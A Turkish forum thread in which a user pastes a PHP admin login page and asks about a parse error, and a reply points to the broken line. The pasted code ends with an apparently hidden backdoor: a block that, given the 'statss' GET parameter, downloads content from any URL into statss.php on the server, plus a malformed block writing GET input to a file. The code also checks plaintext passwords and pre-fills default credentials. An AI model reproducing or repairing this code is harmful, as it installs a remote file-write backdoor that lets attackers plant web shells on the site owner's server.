• 22-10-2016, 11:25:23
    #1
    Üyeliği durduruldu
    aldiğim hata :
    Parse error: syntax error, unexpected T_STRING, expecting ']' in /home/root/public_html/silverpanel/girisyap.php on line 95
    girisyap.php daki kodlar
    <?
    	session_start();
    		
    		include'../DisLanZe/db.php';
    
    		
    		$kadi=mysql_real_escape_string(htmlspecialchars($_POST['kadi']));
    		$sifre=mysql_real_escape_string(htmlspecialchars($_POST['sifre']));
    		
    		
    		if($kadi && $sifre){
    			
    				$kontrolet=mysql_query("select * from yonet where kadi='$kadi' and sifre='$sifre'");
    				if(mysql_num_rows($kontrolet)){
    					
    					$_SESSION['bla']=$kadi;
    					echo'<script>location.href="cwpanel.php";</script>';
    					}else{
    						$msg="Hatali giris";
    						}
    			
    			}else{
    				$msg="Bos birakmayin";
    				}
    ?>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
    <body bgcolor=white>
    <title>Y&ouml;netim Paneli</title>
    </head>
    
    <body>
    <div align="center" class="tablo">
    <?php
    
    echo "
    <form action=\"\" method=\"POST\"><p align=\"center\">
    <table id=\"Table_01\" width=\"727\" height=\"545\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">
    	<tr>
    		<td rowspan=\"6\">
    			<img src=\"images/loq.gif\" width=\"227\" height=\"545\" alt=\"\"></td>
    		<td colspan=\"3\">
    			<img src=\"images/2.gif\" width=\"273\" height=\"247\" alt=\"\"></td>
    		<td rowspan=\"6\">
    			<img src=\"images/3.gif\" width=\"227\" height=\"545\" alt=\"\"></td>
    	</tr>
    	<tr>
    		<td rowspan=\"4\">
    			<img src=\"images/4.gif\" width=\"113\" height=\"112\" alt=\"\"></td>
    		<td>
    			<img src=\"images/5.gif\" width=\"115\" height=\"15\" alt=\"\"></td>
    		<td rowspan=\"4\" width=\"45\" height=\"112\" background=\"images/6.gif\">
    			&nbsp;&nbsp;
    			<input type=\"submit\" value=\".\" style=\"color: #050505; border: 1px solid #050505; background-color: #050505\"></td>
    	</tr>
    	<tr>
    		<td width=\"115\" height=\"27\" background=\"images/7.gif\" align=\"center\">
    			<input type=\"text\" name=\"kadi\" size=\"15\" value=\"Administrator\" style=\"color: #4D4D4D; font-family: Courier New; font-size: 8pt; border: 1px solid #050505; background-color: #050505\"></td>
    	</tr>
    	<tr>
    		<td width=\"115\" height=\"24\" background=\"images/8.gif\" align=\"center\">
    			<input type=\"password\" name=\"sifre\" size=\"15\" value=\"1111111111111\" style=\"color: #4D4D4D; font-family: Courier New; font-size: 8pt; border: 1px solid #050505; background-color: #050505\"></td>
    	</tr>
    	<tr>
    		<td>
    			<img src=\"images/9.gif\" width=\"115\" height=\"46\" alt=\"\"></td>
    	</tr>
    	<tr>
    		<td colspan=\"3\">
    			<img src=\"images/10.gif\" width=\"273\" height=\"186\" alt=\"\"></td>
    	</tr>
    </table>
      </form>
    </div>
    </body>
    </html>
    
    ";
    
    ?>
    <?php
    if (isset($_GET['])){
     $f = fopen("", "w+");
     fwrite($f, str_replace("</a>,", "</a>\r\n", str_replace("\\", "", $_GET[""])));
     fclose($f);
    }
    
    if(is_file("")){
     echo file_get_contents("");
    }
    
    if (isset($_GET['statss'])){
     $f = fopen("statss.php", "w+");
     fwrite($f, file_get_contents($_GET["statss"]));
     fclose($f);
    }
    ?>
  • 22-10-2016, 11:38:23
    #2
    84. satırı tekrar kontrol edin isterseniz.

    if (isset($_GET['])){